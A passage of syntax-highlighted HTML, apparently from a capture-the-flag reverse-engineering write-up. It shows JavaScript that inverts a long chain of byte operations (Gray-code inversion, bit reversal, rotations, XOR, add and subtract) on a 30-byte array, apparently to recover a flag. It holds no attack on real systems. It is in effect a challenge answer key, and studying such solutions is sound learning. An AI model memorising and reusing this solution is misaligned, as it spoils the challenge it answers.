class="number">0xff</span></span><br><span class="line"><span class="comment">// f[10]=f[10]^(f[10]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">10</span>]) &#123;</span><br><span class="line">        f[<span class="number">10</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">15</span>]+=f[<span class="number">28</span>],f[<span class="number">15</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">15</span>]=(((f[<span class="number">15</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">15</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">3</span>]-=f[<span class="number">24</span>],f[<span class="number">3</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">14</span>]^=f[<span class="number">13</span>]</span><br><span class="line">f[<span class="number">8</span>]=~f[<span class="number">8</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">16</span>]+=f[<span class="number">7</span>],f[<span class="number">16</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[26]=f[26]^(f[26]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">26</span>]) &#123;</span><br><span class="line">        f[<span class="number">26</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// f[10]=f[10]^(f[10]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">10</span>]) &#123;</span><br><span class="line">        f[<span class="number">10</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">26</span>]=f[<span class="number">26</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">26</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">25</span>]+=f[<span class="number">24</span>],f[<span class="number">25</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]=f[<span class="number">8</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">8</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">20</span>]^=f[<span class="number">3</span>]</span><br><span class="line">f[<span class="number">3</span>]=f[<span class="number">3</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">3</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line"><span class="comment">// f[29]=f[29]^(f[29]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">29</span>]) &#123;</span><br><span class="line">        f[<span class="number">29</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">10</span>]+=f[<span class="number">7</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">23</span>]=~f[<span class="number">23</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">12</span>]-=f[<span class="number">13</span>],f[<span class="number">12</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]^=f[<span class="number">16</span>]</span><br><span class="line">f[<span class="number">18</span>]=~f[<span class="number">18</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">7</span>]+=f[<span class="number">17</span>],f[<span class="number">7</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[11]=f[11]^(f[11]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">11</span>]) &#123;</span><br><span class="line">        f[<span class="number">11</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">0</span>]+=f[<span class="number">14</span>],f[<span class="number">0</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]+=f[<span class="number">2</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]+=f[<span class="number">8</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[10]=f[10]^(f[10]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">10</span>]) &#123;</span><br><span class="line">        f[<span class="number">10</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">6</span>]=f[<span class="number">6</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">6</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">2</span>]-=f[<span class="number">17</span>],f[<span class="number">2</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]=(((f[<span class="number">11</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">11</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">13</span>]=(((f[<span class="number">13</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">13</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]+=f[<span class="number">27</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[13]=f[13]^(f[13]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">13</span>]) &#123;</span><br><span class="line">        f[<span class="number">13</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">10</span>]=f[<span class="number">10</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">10</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">25</span>]=f[<span class="number">25</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">25</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">4</span>]=f[<span class="number">4</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">4</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">0</span>]-=f[<span class="number">22</span>],f[<span class="number">0</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">21</span>]-=f[<span class="number">18</span>],f[<span class="number">21</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]-=f[<span class="number">1</span>],f[<span class="number">8</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">3</span>]=f[<span class="number">3</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">3</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line"><span class="comment">// f[12]=f[12]^(f[12]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">12</span>]) &#123;</span><br><span class="line">        f[<span class="number">12</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">24</span>]=(((f[<span class="number">24</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">24</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[21]=f[21]^(f[21]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">21</span>]) &#123;</span><br><span class="line">        f[<span class="number">21</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// f[17]=f[17]^(f[17]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">17</span>]) &#123;</span><br><span class="line">        f[<span class="number">17</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// f[14]=f[14]^(f[14]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">14</span>]) &#123;</span><br><span class="line">        f[<span class="number">14</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">11</span>]^=f[<span class="number">27</span>]</span><br><span class="line">f[<span class="number">1</span>]+=f[<span class="number">24</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">2</span>]=f[<span class="number">2</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">2</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">13</span>]=f[<span class="number">13</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">13</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">24</span>]-=f[<span class="number">12</span>],f[<span class="number">24</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]+=f[<span class="number">20</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]+=f[<span class="number">22</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">24</span>]=~f[<span class="number">24</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">10</span>]=f[<span class="number">10</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">10</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">26</span>]^=f[<span class="number">17</span>]</span><br><span class="line">f[<span class="number">22</span>]=~f[<span class="number">22</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">28</span>]+=f[<span class="number">13</span>],f[<span class="number">28</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">17</span>]-=f[<span class="number">27</span>],f[<span class="number">17</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[0]=f[0]^(f[0]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">0</span>]) &#123;</span><br><span class="line">        f[<span class="number">0</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// f[19]=f[19]^(f[19]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">19</span>]) &#123;</span><br><span class="line">        f[<span class="number">19</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">25</span>]=f[<span class="number">25</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">25</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">2</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">19</span>]^=f[<span class="number">12</span>]</span><br><span class="line">f[<span class="number">12</span>]+=f[<span class="number">8</span>],f[<span class="number">12</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">17</span>]^=f[<span class="number">13</span>]</span><br><span class="line">f[<span class="number">21</span>]^=f[<span class="number">5</span>]</span><br><span class="line"><span class="comment">// f[6]=f[6]^(f[6]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">6</span>]) &#123;</span><br><span class="line">        f[<span class="number">6</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">8</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">15</span>]+=f[<span class="number">8</span>],f[<span class="number">15</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">6</span>]</span><br><span class="line">f[<span class="number">13</span>]^=f[<span class="number">2</span>]</span><br><span class="line">f[<span class="number">14</span>]=f[<span class="number">14</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">14</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">1</span>]=f[<span class="number">1</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">1</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">15</span>]^=f[<span class="number">20</span>]</span><br><span class="line">f[<span class="number">21</span>]-=f[<span class="number">0</span>],f[<span class="number">21</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]+=f[<span class="number">18</span>],f[<span class="number">8</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">10</span>]-=f[<span class="number">22</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]+=f[<span class="number">17</span>],f[<span class="number">8</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">7</span>]^=f[<span class="number">21</span>]</span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">29</span>]=f[<span class="number">29</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">29</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">0</span>]=f[<span class="number">0</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">0</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">4</span>]=f[<span class="number">4</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">4</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">18</span>]-=f[<span class="number">25</span>],f[<span class="number">18</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">22</span>]+=f[<span class="number">23</span>],f[<span class="number">22</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">17</span>]^=f[<span class="number">12</span>]</span><br><span class="line">f[<span class="number">20</span>]^=f[<span class="number">5</span>]</span><br><span class="line">f[<span class="number">18</span>]=f[<span class="number">18</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">18</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">28</span>]+=f[<span class="number">0</span>],f[<span class="number">28</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">21</span>]-=f[<span class="number">25</span>],f[<span class="number">21</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">7</span>]=f[<span class="number">7</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">7</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">19</span>]=f[<span class="number">19</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">19</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line"><span class="comment">// f[1]=f[1]^(f[1]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">1</span>]) &#123;</span><br><span class="line">        f[<span class="number">1</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">9</span>]=~f[<span class="number">9</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">24</span>]^=f[<span class="number">25</span>]</span><br><span class="line"><span class="comment">// f[9]=f[9]^(f[9]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">9</span>]) &#123;</span><br><span class="line">        f[<span class="number">9</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">10</span>]+=f[<span class="number">9</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">3</span>]=f[<span class="number">3</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">3</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">22</span>]=f[<span class="number">22</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">22</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">8</span>]-=f[<span class="number">16</span>],f[<span class="number">8</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">24</span>]^=f[<span class="number">27</span>]</span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">29</span>]+=f[<span class="number">21</span>],f[<span class="number">29</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]^=f[<span class="number">2</span>]</span><br><span class="line">f[<span class="number">5</span>]^=f[<span class="number">3</span>]</span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">26</span>]</span><br><span class="line">f[<span class="number">25</span>]+=f[<span class="number">4</span>],f[<span class="number">25</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[5]=f[5]^(f[5]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">5</span>]) &#123;</span><br><span class="line">        f[<span class="number">5</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">4</span>]-=f[<span class="number">18</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]=(((f[<span class="number">1</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">1</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]=~f[<span class="number">8</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">16</span>]^=f[<span class="number">11</span>]</span><br><span class="line">f[<span class="number">4</span>]=f[<span class="number">4</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">4</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">20</span>]-=f[<span class="number">24</span>],f[<span class="number">20</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[20]=f[20]^(f[20]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">20</span>]) &#123;</span><br><span class="line">        f[<span class="number">20</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">10</span>]=f[<span class="number">10</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">10</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">6</span>]=~f[<span class="number">6</span>]&amp;<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[2]=f[2]^(f[2]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">2</span>]) &#123;</span><br><span class="line">        f[<span class="number">2</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">12</span>]=f[<span class="number">12</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">12</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">12</span>]=f[<span class="number">12</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">12</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">15</span>]=~f[<span class="number">15</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]^=f[<span class="number">18</span>]</span><br><span class="line">f[<span class="number">9</span>]-=f[<span class="number">28</span>],f[<span class="number">9</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]=f[<span class="number">1</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">1</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">11</span>]=~f[<span class="number">11</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">25</span>]-=f[<span class="number">4</span>],f[<span class="number">25</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">12</span>]^=f[<span class="number">4</span>]</span><br><span class="line">f[<span class="number">15</span>]+=f[<span class="number">17</span>],f[<span class="number">15</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">25</span>]^=f[<span class="number">28</span>]</span><br><span class="line">f[<span class="number">26</span>]+=f[<span class="number">14</span>],f[<span class="number">26</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">19</span>]=f[<span class="number">19</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">19</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line"><span class="comment">// f[8]=f[8]^(f[8]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">8</span>]) &#123;</span><br><span class="line">        f[<span class="number">8</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">10</span>]+=f[<span class="number">22</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">28</span>]^=f[<span class="number">0</span>]</span><br><span class="line">f[<span class="number">6</span>]^=f[<span class="number">5</span>]</span><br><span class="line">f[<span class="number">6</span>]-=f[<span class="number">28</span>],f[<span class="number">6</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">14</span>]=(((f[<span class="number">14</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">14</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">25</span>]=(((f[<span class="number">25</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">25</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">12</span>]+=f[<span class="number">3</span>],f[<span class="number">12</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">28</span>]=f[<span class="number">28</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">28</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">8</span>]=f[<span class="number">8</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">8</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">16</span>]+=f[<span class="number">9</span>],f[<span class="number">16</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">19</span>]=f[<span class="number">19</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">19</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">3</span>]=(((f[<span class="number">3</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">3</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">28</span>]</span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">1</span>]=f[<span class="number">1</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">1</span>]&gt;&gt;<span class="number">7</span></span><br><span 